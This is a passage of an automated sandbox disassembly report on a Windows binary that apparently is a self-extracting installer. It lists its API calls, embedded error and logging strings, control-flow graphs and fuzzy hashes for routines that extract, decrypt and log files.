                                                                • Part of subcall function 00216463: HeapFree.KERNEL32(00000000,?,00215BF4), ref: 002164A7
                                                              • CloseHandle.KERNEL32(000001D0), ref: 00215C5E
                                                                • Part of subcall function 00218E6F: GetProcessHeap.KERNEL32(00000000,?,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E79
                                                                • Part of subcall function 00218E6F: HeapFree.KERNEL32(00000000,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E80
                                                              Strings
                                                              • Failed to execute file, xrefs: 00215BBA
                                                              • Failed to extract, xrefs: 00215B89
                                                              • Failed to select and/or prepare the directory for extraction, xrefs: 00215B59
                                                              • Unable to estimate the required size, xrefs: 00215B1F
                                                              • Failed to allocate log, xrefs: 00215AC5
                                                              • Failed to initialize arguments, xrefs: 002159FE
                                                              • === Logging stopped: %S ===, xrefs: 00215C2D
                                                              • \dd_%s_decompression_log.txt, xrefs: 00215A95
                                                              • Exiting with result code: 0x%x, xrefs: 00215C08
                                                              • temp, xrefs: 00215A83
                                                              • Failed to open the box, xrefs: 00215AFC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$CommandFreeHandleLineProcess_memset$ArgvCloseEnvironmentErrorExtensionLastModulePathRemoveVariable_wcsrchrswprintf
                                                              • String ID: === Logging stopped: %S ===$Exiting with result code: 0x%x$Failed to allocate log$Failed to execute file$Failed to extract$Failed to initialize arguments$Failed to open the box$Failed to select and/or prepare the directory for extraction$Unable to estimate the required size$\dd_%s_decompression_log.txt$temp
                                                              • API String ID: 4209647820-1996636437
                                                              • Opcode ID: 19df6012a6049c3618081398d619fa646852ed0732f59e0498384ff22dc638d4
                                                              • Instruction ID: 5e417afe74eb10f77e2f3b9c7f83389b532249c1d8057c6293c7109c2ae48f0c
                                                              • Opcode Fuzzy Hash: 19df6012a6049c3618081398d619fa646852ed0732f59e0498384ff22dc638d4
                                                              • Instruction Fuzzy Hash: 2E813571538B62EBC311EF64EC49AEF73E9ABE4700F11052AF64493152DB70D9E48B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021621F Relevance: 22.7, APIs: 6, Strings: 9, Instructions: 191memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 399 21621f-21624f GetProcessHeap HeapAlloc 400 216251-21625b 399->400 401 216260-216268 399->401 402 2163ed-2163f4 call 21854a 400->402 403 2162fd-216305 401->403 404 21626e 401->404 413 2163f5 call 2168fb 402->413 406 216353-21635e call 21676f 403->406 407 216307-21632e GetProcessHeap HeapAlloc 403->407 405 216271-21627a call 219dc6 404->405 415 21627f-216283 405->415 417 216360-216365 406->417 418 21636a-216389 call 2184c7 call 2169b0 406->418 407->406 412 216330-21633a 407->412 412->402 422 2163fa-2163ff 413->422 419 216289-21629a call 219ef3 415->419 420 21633f-216344 415->420 417->402 441 2163d8-2163e6 call 2169b0 call 2169e3 418->441 442 21638b-216394 call 2169e3 418->442 428 2162a0-2162a4 419->428 429 216349-21634e 419->429 420->402 425 216401-216407 422->425 426 21643c-216442 422->426 430 216421-216435 GetProcessHeap HeapFree 425->430 431 216409-216411 425->431 433 2162a6-2162ac 428->433 434 2162ae-2162b9 428->434 429->402 430->426 438 216437 call 219a29 430->438 435 216413 call 21a46e 431->435 436 216418-21641f 431->436 439 2162bb-2162c0 433->439 434->439 435->436 436->430 436->431 438->426 444 2162c2-2162c5 439->444 445 2162e7-2162f7 439->445 441->422 455 2163e8 441->455 454 216396-216399 442->454 442->455 448 2162c8-2162cc 444->448 445->403 445->405 451 2162d3-2162df 448->451 452 2162ce-2162d1 448->452 456 2162e1-2162e5 451->456 452->456 458 2163b0-2163b9 call 2169e3 454->458 459 21639b-2163aa call 21a003 454->459 455->402 456->445 456->448 458->455 465 2163bb-2163c7 call 21a222 458->465 459->458 464 216445-21644b 459->464 467 216453-21645c call 21854a 464->467 469 2163cc-2163d0 465->469 467->413 471 2163d2-2163d6 469->471 472 21644d-21644e 469->472 471->441 471->442 472->467
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,74DF23A0,00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021623D
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216244
                                                              • GetProcessHeap.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021631A
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216321
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216426
                                                              • HeapFree.KERNEL32(00000000,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021642D
                                                              Strings
                                                              • Extracting files to: %S, xrefs: 0021636D
                                                              • Failed to verify box container #%d., xrefs: 00216446
                                                              • Failed to alloc cleanup list buffer, xrefs: 00216335
                                                              • Failed to extract all files out of box container #%d., xrefs: 0021644E
                                                              • User canceled extraction..., xrefs: 002163E8
                                                              • Failed to allocate memory to hold container handles., xrefs: 00216256
                                                              • Failed to open container., xrefs: 0021633F
                                                              • Failed to read container header., xrefs: 00216349
                                                              • Failed to start reporting progress, xrefs: 00216360
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free
                                                              • String ID: Extracting files to: %S$Failed to alloc cleanup list buffer$Failed to allocate memory to hold container handles.$Failed to extract all files out of box container #%d.$Failed to open container.$Failed to read container header.$Failed to start reporting progress$Failed to verify box container #%d.$User canceled extraction...
                                                              • API String ID: 1864747095-3704756192
                                                              • Opcode ID: 2439fb59f22fb2decf2b8887fe73cebce2b5074553125a145e647f672fea3027
                                                              • Instruction ID: 5329a3b1cbfe855740d72d71d40327af1b9da558f97f0d7c2efd1afa86e9149f
                                                              • Opcode Fuzzy Hash: 2439fb59f22fb2decf2b8887fe73cebce2b5074553125a145e647f672fea3027
                                                              • Instruction Fuzzy Hash: F661D632D20226ABDB219F98D889AEE77F1EF30B10F154165E911A7241DB70DDF0CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021F9FE Relevance: 20.3, APIs: 7, Strings: 4, Instructions: 1051COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 0022003F
                                                              • DeleteCriticalSection.KERNEL32(?,?,?), ref: 00220592
                                                                • Part of subcall function 00222B6C: __EH_prolog3.LIBCMT ref: 00222B73
                                                              • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 00220433
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 0022070F
                                                              • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 002208F7
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 00220AE6
                                                                • Part of subcall function 00228513: __EH_prolog3.LIBCMT ref: 0022851D
                                                              • __CxxThrowException@8.LIBCMT ref: 00220B37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CriticalDeleteSection$H_prolog3$Exception@8Throw_malloc
                                                              • String ID: ($)$kQ"$lU!
                                                              • API String ID: 3630289165-1381640395
                                                              • Opcode ID: 8b98599d87f2f6565f0b05a231cb1cd0557cd899c54a9d76dfdf9287ee75d44c
                                                              • Instruction ID: 8f718f4b81b1c8e8dedda2da53b73166a262da5b4ebfcc2c4e3f93fd58353609
                                                              • Opcode Fuzzy Hash: 8b98599d87f2f6565f0b05a231cb1cd0557cd899c54a9d76dfdf9287ee75d44c
                                                              • Instruction Fuzzy Hash: F3B25671518386DFD330DFA8D488B9ABBE4BF98304F04496EE58D87252CB71A859CF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217C12 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 56libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 850 217c12-217c1e 851 217c20-217c2d LoadLibraryW 850->851 852 217c8c-217c99 DecryptFileW 850->852 855 217c53-217c66 GetProcAddress 851->855 856 217c2f-217c37 GetLastError 851->856 853 217cc5-217cc8 852->853 854 217c9b-217ca3 GetLastError 852->854 858 217cb1 854->858 859 217ca5-217caf 854->859 855->852 857 217c68-217c70 GetLastError 855->857 860 217c45 856->860 861 217c39-217c43 856->861 862 217c72-217c7c 857->862 863 217c7e 857->863 864 217cb3 858->864 865 217cb8 858->865 859->858 866 217c47 860->866 867 217c4c-217c51 860->867 861->860 862->863 869 217c80 863->869 870 217c85-217c8a 863->870 864->865 868 217cbd-217cc4 call 21854a 865->868 866->867 867->868 868->853 869->870 870->868
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?), ref: 00217C25
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C2F
                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileW), ref: 00217C59
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C68
                                                              • DecryptFileW.ADVAPI32(?,00000000), ref: 00217C91
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C9B
                                                              Strings
                                                              • advapi32.dll, xrefs: 00217C20
                                                              • Failed to decrypt the extract directory, xrefs: 00217CB8
                                                              • Failed to load DecryptFileW from advapi.dll, xrefs: 00217C85
                                                              • DecryptFileW, xrefs: 00217C53
                                                              • Failed to load advapi32.dll, xrefs: 00217C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$AddressDecryptFileLibraryLoadProc
                                                              • String ID: DecryptFileW$Failed to decrypt the extract directory$Failed to load DecryptFileW from advapi.dll$Failed to load advapi32.dll$advapi32.dll
                                                              • API String ID: 156776402-3428403797
                                                              • Opcode ID: c99c103e1bd720990142f0aef253f335d70b0b0a434083a49daa8547ce006df9
                                                              • Instruction ID: 9798b4a03cc2573a78a05655e6bdda8361d522870e4be3000f0d7129f79c6374
                                                              • Opcode Fuzzy Hash: c99c103e1bd720990142f0aef253f335d70b0b0a434083a49daa8547ce006df9
                                                              • Instruction Fuzzy Hash: 24111E72BA82439AF3201F61BD0D7E26AE85BB1785F21403ABA0DD51A1EB78C4F15694
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00224252 Relevance: 18.3, APIs: 7, Strings: 3, Instructions: 792COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID: "$kQ"$lU!
                                                              • API String ID: 2427045233-661184108
                                                              • Opcode ID: b4929a64b29ef6bad3bb431bc30deb436b16a4608b2d23b88cf483791a2a2580
                                                              • Instruction ID: 28b3d0d29e6f9db901a70ebe78c73559ed2408eb03c7440ee9a59f3466a63fb2
                                                              • Opcode Fuzzy Hash: b4929a64b29ef6bad3bb431bc30deb436b16a4608b2d23b88cf483791a2a2580
                                                              • Instruction Fuzzy Hash: B2727930518392EFD721DFA4D484B9ABBE4BF99308F044A5DE4C98B252C774E865CF62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021751D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 128encryptionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1132 21751d-217560 CryptAcquireContextA 1133 217562-21756c GetLastError 1132->1133 1134 21758d-21759e CryptGenRandom 1132->1134 1137 21757c 1133->1137 1138 21756e-21757a 1133->1138 1135 2175a0-2175aa GetLastError 1134->1135 1136 2175cb-2175df 1134->1136 1139 2175ba 1135->1139 1140 2175ac-2175b8 1135->1140 1141 2175e1-217606 call 218b7e 1136->1141 1142 217657-21765c 1136->1142 1143 217583-217588 1137->1143 1144 21757e 1137->1144 1138->1137 1145 2175c1-2175c6 1139->1145 1146 2175bc 1139->1146 1140->1139 1156 217643-217648 1141->1156 1157 217608-21760b 1141->1157 1148 217668-21766b 1142->1148 1149 21765e-217662 CryptReleaseContext 1142->1149 1150 21764f-217656 call 21854a 1143->1150 1144->1143 1145->1150 1146->1145 1153 217675-217685 call 2291d5 1148->1153 1154 21766d-217670 call 218e6f 1148->1154 1149->1148 1150->1142 1154->1153 1156->1150 1160 217614-217624 call 218abb 1157->1160 1161 21760d-217612 1157->1161 1167 217626-21762a 1160->1167 1168 21764a 1160->1168 1163 217634-21763f 1161->1163 1163->1141 1165 217641 1163->1165 1165->1142 1167->1163 1169 21762c-21762f call 218e6f 1167->1169 1168->1150 1169->1163
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,0023BEF0,?,?,?,?,?,0023BEF0), ref: 00217558
                                                              • GetLastError.KERNEL32 ref: 00217562
                                                              • CryptGenRandom.ADVAPI32(?,00000010,?), ref: 00217596
                                                              • GetLastError.KERNEL32 ref: 002175A0
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00217662
                                                              Strings
                                                              • Failed to concatenate the formatted byte to the random string, xrefs: 0021764A
                                                              • Failed to generate a random value, xrefs: 002175C1
                                                              • %02x, xrefs: 002175F4
                                                              • Failed to allocate formatted current byte for the random string, xrefs: 00217643
                                                              • Failed to acquire Crypto context, xrefs: 00217583
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorLast$AcquireRandomRelease
                                                              • String ID: %02x$Failed to acquire Crypto context$Failed to allocate formatted current byte for the random string$Failed to concatenate the formatted byte to the random string$Failed to generate a random value
                                                              • API String ID: 236824231-4110481378
                                                              • Opcode ID: 863f8cefd06f57a0c2e5302d8f40c880508b743f567f44aa4084a70ad0e6504d
                                                              • Instruction ID: 1df99f8d5fa1a80710aedfd0d824c4abefddd41dcdd287f082cc3a1efc760184
                                                              • Opcode Fuzzy Hash: 863f8cefd06f57a0c2e5302d8f40c880508b743f567f44aa4084a70ad0e6504d
                                                              • Instruction Fuzzy Hash: 1B41F872D2815AABDB109FA8DC497EEBBF9AF74300F150036ED01B3181D67849A08B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217A0A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDriveTypeW.KERNELBASE(00217887,00000000,?), ref: 00217A32
                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00217A50
                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00217A59
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00217A8B
                                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00217AB0
                                                              • CloseHandle.KERNEL32(?), ref: 00217AC5
                                                              • SetErrorMode.KERNELBASE(?), ref: 00217ACE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$CloseControlCreateDeviceDriveFileHandleType
                                                              • String ID: \\.\?:
                                                              • API String ID: 1714706890-2364848050
                                                              • Opcode ID: 11b8dba31f8058aa800f40b0423193e71133974800c242d87bb1f973fe816949
                                                              • Instruction ID: 5c76c89f7e4af05117e50dc4076fcb1c687160f9d32d076e373bcfde31d20637
                                                              • Opcode Fuzzy Hash: 11b8dba31f8058aa800f40b0423193e71133974800c242d87bb1f973fe816949
                                                              • Instruction Fuzzy Hash: BF218D71D14219BBCB11DFA5EC48ADEBBF9EF99320F004415F905E7150DB709690CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002184C7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                              • swprintf.LIBCMT ref: 00218513
                                                                • Part of subcall function 0021870C: lstrlenA.KERNEL32(00000000,00000004,?,?,10/4/2023, 15:57:52,?,?,?,?,002184C0,?,?,00000000,?,00218526,?), ref: 00218738
                                                                • Part of subcall function 0021870C: WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218762
                                                                • Part of subcall function 0021870C: WriteFile.KERNELBASE(00214DA4,00000002,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218787
                                                                • Part of subcall function 0021870C: GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0021878D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ErrorLastLocalTimelstrlenswprintf
                                                              • String ID: %u/%u/%u, %u:%u:%u$10/4/2023, 15:57:52$[%s]
                                                              • API String ID: 4160318958-4194652310
                                                              • Opcode ID: 574c4c56983596da465b832fcf38acbb20604392303a264a44b1475bf464c073
                                                              • Instruction ID: 1eac01ce5e9ac2e06d09ae5d028f20f28c43738a205aba36e49d3f639bdc1fcc
                                                              • Opcode Fuzzy Hash: 574c4c56983596da465b832fcf38acbb20604392303a264a44b1475bf464c073
                                                              • Instruction Fuzzy Hash: 2C012C75910118BACB10EF969C45EFFB7FCAF49B14F100066F948E2180DA789EA1E775
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218E9C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTimeZoneInformation.KERNELBASE(?), ref: 00218EB8
                                                              • GetSystemTime.KERNEL32(?), ref: 00218EC2
                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00218ED7
                                                              Strings
                                                              • %04d/%02d/%02d %02d:%02d:%02d, xrefs: 00218EFB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Time$System$InformationLocalSpecificZone
                                                              • String ID: %04d/%02d/%02d %02d:%02d:%02d
                                                              • API String ID: 1716759327-2911751566
                                                              • Opcode ID: e912fb42d6c359aa032c0f39cfb34c611e5034df605671a03715bc80d2f325c0
                                                              • Instruction ID: 3386da231afdcfa26eedb8ce8d45b52b315a64af6cd34e3599bd6941dc4a701b
                                                              • Opcode Fuzzy Hash: e912fb42d6c359aa032c0f39cfb34c611e5034df605671a03715bc80d2f325c0
                                                              • Instruction Fuzzy Hash: C501D6A280011DBACB10DBD5D949AFFB7FCAF0C605F104056FA49E2040EA38AA94DB71
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00222056 Relevance: 3.6, APIs: 2, Instructions: 585COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 00222060
                                                              • __CxxThrowException@8.LIBCMT ref: 00222229
                                                                • Part of subcall function 00233B07: RaiseException.KERNEL32(00233665,?,e6#,?,?,?,?,?,00233665,?,00237124,0023BE98), ref: 00233B49
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 002335E6: std::exception::exception.LIBCMT ref: 00233635
                                                                • Part of subcall function 002335E6: std::exception::exception.LIBCMT ref: 0023364F
                                                                • Part of subcall function 002335E6: __CxxThrowException@8.LIBCMT ref: 00233660
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception$ExceptionH_prolog3_catchRaise_malloc
                                                              • String ID:
                                                              • API String ID: 1092593795-0
                                                              • Opcode ID: 41ec4ed5a8e7d4de42864dd20fe9819641c602b06b7b82448c64306cea2c2ccf
                                                              • Instruction ID: 92e87259cb153254ddc4836bbfcaf51fc824f465c10ee7110bf50ac64baa86e8
                                                              • Opcode Fuzzy Hash: 41ec4ed5a8e7d4de42864dd20fe9819641c602b06b7b82448c64306cea2c2ccf
                                                              • Instruction Fuzzy Hash: AD429F70910269EFCB10CFA8C584ADDBBF4BF59304F248189E449AB352C776AE65CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00220BD0 Relevance: 3.6, APIs: 2, Instructions: 576COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID:
                                                              • API String ID: 3670251406-0
                                                              • Opcode ID: 08ee24109f51696dd593a6c0a6ba157f34e81e9dda13edde7116eeeeaccf2a76
                                                              • Instruction ID: f10b90cf59a558baface90d3f6e3aba71c30bb558db88e3fafeff811bea0215f
                                                              • Opcode Fuzzy Hash: 08ee24109f51696dd593a6c0a6ba157f34e81e9dda13edde7116eeeeaccf2a76
                                                              • Instruction Fuzzy Hash: FF423C71D10269EFCF10DFD4D880ADDBBB5BF18314F15819AE849AB252C770AAA5CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021CA78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE(?), ref: 0021CACB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: e6a098d19377bd7d266d4d6ac02050793448787a9e3324b22f0b3e86d067dcf7
                                                              • Instruction ID: 3a7dd22d4898b553155ab4e34cfc5fe314c4f6976b06e4cb549b203f049c59ee
                                                              • Opcode Fuzzy Hash: e6a098d19377bd7d266d4d6ac02050793448787a9e3324b22f0b3e86d067dcf7
                                                              • Instruction Fuzzy Hash: 1AF0B7B5900B458BC320DF6AC4446DBFBF8BF98304F10481FD8BA93210D7B0A5898F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00223049 Relevance: .4, Instructions: 367COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
